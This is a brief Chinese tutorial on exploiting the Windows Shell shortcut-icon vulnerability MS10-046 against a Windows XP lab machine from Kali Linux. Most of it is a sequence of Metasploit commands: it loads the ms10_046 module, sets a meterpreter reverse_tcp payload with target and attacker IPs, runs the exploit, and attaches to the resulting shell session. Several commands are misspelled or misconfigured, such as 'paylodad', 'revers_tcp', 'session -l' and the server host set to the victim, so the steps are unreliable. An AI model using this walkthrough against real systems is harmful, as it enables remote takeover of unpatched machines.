黑客是如何利用MS10 黑客是如何利用漏洞的

一、漏洞介绍
【黑客是如何利用MS10 黑客是如何利用漏洞的】这是Windows Shell中一个公开披露的漏洞 。如果显示特制快捷方式的图标 , 则该漏洞可能允许远程执行代码 。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限 。与使用管理用户权限进行操作的用户相比 , 将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小 。


二、资源装备
1.安装好Kali Linux的虚拟机一台;
2.Windows xp 计算机一台 。
3.整装待发的小白一个 。


三、攻防实战
2.1 在kali中启动MSF 。
打开终端 键入命令:msfconsole


黑客是如何利用MS10 黑客是如何利用漏洞的

文章插图


2.2 配置相关参数
①键入命令:search ms10-046
②复制msf返回的命令前加use:use exploit/windows/browser/ms10-046_shortcut_icon_dllloader
③设置payload: set paylodad windows/meterpreter/revers_tcp
④显示需要配置的参数 :show options


黑客是如何利用MS10 黑客是如何利用漏洞的

文章插图


⑤设置靶机(win xp)IP地址 set srvhosts 192.168.xxx.xxx
⑥设置本机(kali) IP地址 set lhost 192.168.xxx.xxx
⑦运行payload键入命令:exploit


黑客是如何利用MS10 黑客是如何利用漏洞的

文章插图


2.3 查看接收到的会话 , 并对靶机实行攻击
键入命令:session -l  , 查看会话 。session -l x(x为会话id)连接会话 。


黑客是如何利用MS10 黑客是如何利用漏洞的

文章插图